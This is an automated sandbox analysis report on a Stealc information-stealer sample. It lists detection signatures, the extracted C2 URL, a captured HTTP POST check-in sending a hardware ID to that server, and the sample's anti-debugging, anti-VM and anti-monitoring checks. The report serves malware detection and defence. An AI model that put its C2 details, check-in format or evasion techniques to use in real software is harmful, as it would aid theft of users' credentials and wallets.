Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1522624
MD5:bb08552092b4a0fe9610493efde4ddfc
SHA1:e4bd47f98aa7e1d41c6c2265ca45d606b49ba023
SHA256:094b280b1e8ecb2574307e5f44d1678b3abe07c71ebfe779a7dd914bf789292b
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7260 cmdline: "C:\Users\user\Desktop\file.exe" MD5: BB08552092B4A0FE9610493EFDE4DDFC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1702489973.000000000087E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1662202182.0000000004D90000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7260JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7260JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.c40000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-30T13:11:02.926589+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.c40000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/e2b1563c6670f193.php#Virustotal: Detection: 18%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpsVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/wsVirustotal: Detection: 16%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00C4C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C49AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00C49AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C47240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00C47240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C49B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00C49B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C58EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00C58EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00C538B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C54910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C54910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00C4DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00C4E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C54570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00C54570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00C4ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C416D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C53EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00C53EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C4F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00C4BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C4DE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJECHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 34 41 39 36 46 44 31 45 38 45 33 39 38 34 32 31 32 34 37 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 2d 2d 0d 0a Data Ascii: ------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="hwid"974A96FD1E8E3984212470------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="build"doma------DHCBAEHJJJKKFIDGHJEC--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C44880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00C44880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJECHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 34 41 39 36 46 44 31 45 38 45 33 39 38 34 32 31 32 34 37 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 2d 2d 0d 0a Data Ascii: ------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="hwid"974A96FD1E8E3984212470------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="build"doma------DHCBAEHJJJKKFIDGHJEC--
                Source: file.exe, 00000000.00000002.1702489973.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1702489973.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1702489973.00000000008DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1702489973.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1702489973.00000000008F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1702489973.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1702489973.00000000008DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1702489973.00000000008C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php#
                Source: file.exe, 00000000.00000002.1702489973.00000000008E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&8
                Source: file.exe, 00000000.00000002.1702489973.00000000008DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpDWF
                Source: file.exe, 00000000.00000002.1702489973.00000000008C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phps
                Source: file.exe, 00000000.00000002.1702489973.00000000008DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.1702489973.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37O

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB50B20_2_00FB50B2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010199870_2_01019987
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F170330_2_00F17033
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F318230_2_00F31823
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010070430_2_01007043
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100D3700_2_0100D370
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100FBE60_2_0100FBE6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01012BE70_2_01012BE7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101650C0_2_0101650C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010115620_2_01011562
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB04360_2_00EB0436
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01008C550_2_01008C55
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0E5180_2_00F0E518
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100E7B60_2_0100E7B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010147F90_2_010147F9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101CE320_2_0101CE32
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA4FBB0_2_00FA4FBB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01017E750_2_01017E75
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100A6BF0_2_0100A6BF
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00C445C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: nouqlerf ZLIB complexity 0.9947534961112773
                Source: file.exe, 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1662202182.0000000004D90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C58680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00C58680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C53720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00C53720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8LCNO65F.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1867776 > 1048576
                Source: file.exeStatic PE information: Raw size of nouqlerf is bigger than: 0x100000 < 0x1a1e00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.c40000.0.unpack :EW;.rsrc :W;.idata :W; :EW;nouqlerf:EW;fksviyxr:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;nouqlerf:EW;fksviyxr:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C59860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C59860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1ca46c should be: 0x1cd7c5
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: nouqlerf
                Source: file.exeStatic PE information: section name: fksviyxr
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102691C push 2004896Dh; mov dword ptr [esp], ecx0_2_01026985
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102691C push 6790F598h; mov dword ptr [esp], ecx0_2_010269AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB50B2 push edi; mov dword ptr [esp], ebp0_2_00FB5119
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB50B2 push ecx; mov dword ptr [esp], edx0_2_00FB5130
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB50B2 push 59710011h; mov dword ptr [esp], esi0_2_00FB51E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB50B2 push eax; mov dword ptr [esp], ecx0_2_00FB528D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0107314C push ebx; mov dword ptr [esp], ecx0_2_0107315D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C9159 push 7900132Eh; mov dword ptr [esp], edx0_2_010C9175
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C9159 push edx; mov dword ptr [esp], esi0_2_010C91C1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010B1956 push ebx; mov dword ptr [esp], eax0_2_010B196A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010B1956 push ebx; mov dword ptr [esp], 77BA6F00h0_2_010B1978
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010B1956 push edx; mov dword ptr [esp], eax0_2_010B199C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102616A push 21008B4Bh; mov dword ptr [esp], eax0_2_01026173
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102616A push ebx; mov dword ptr [esp], eax0_2_01026295
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019987 push ebx; mov dword ptr [esp], ecx0_2_0101998E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019987 push ecx; mov dword ptr [esp], eax0_2_01019994
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019987 push edx; mov dword ptr [esp], ecx0_2_010199C7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019987 push 7DD9D488h; mov dword ptr [esp], edi0_2_01019A14
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019987 push 54E1729Bh; mov dword ptr [esp], edi0_2_01019AC6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019987 push ecx; mov dword ptr [esp], eax0_2_01019ACA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019987 push esi; mov dword ptr [esp], ebx0_2_01019B69
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019987 push ebp; mov dword ptr [esp], esi0_2_01019BD4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019987 push 7331F313h; mov dword ptr [esp], ecx0_2_01019BDE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019987 push esi; mov dword ptr [esp], edi0_2_01019C79
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019987 push 2374EF46h; mov dword ptr [esp], edi0_2_01019CA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019987 push edi; mov dword ptr [esp], 1976201Dh0_2_01019D41
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019987 push ebp; mov dword ptr [esp], edx0_2_01019E30
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019987 push ebx; mov dword ptr [esp], edx0_2_01019E8D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019987 push ebp; mov dword ptr [esp], esi0_2_01019F68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019987 push 0C71D7F6h; mov dword ptr [esp], ecx0_2_01019F9D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01019987 push ebx; mov dword ptr [esp], eax0_2_01019FA2
                Source: file.exeStatic PE information: section name: nouqlerf entropy: 7.953428476394443

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C59860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C59860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13358
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100BCB9 second address: 100BCDC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F72FCC0D446h 0x00000008 jmp 00007F72FCC0D459h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100BCDC second address: 100BCFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F72FCF2ACD3h 0x00000007 pushad 0x00000008 jmp 00007F72FCF2ACCBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100BCFF second address: 100BD2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F72FCC0D44Eh 0x00000009 jmp 00007F72FCC0D455h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100BD2E second address: 100BD43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push edx 0x00000008 jg 00007F72FCF2ACC6h 0x0000000e js 00007F72FCF2ACC6h 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1020D58 second address: 1020D72 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F72FCC0D451h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
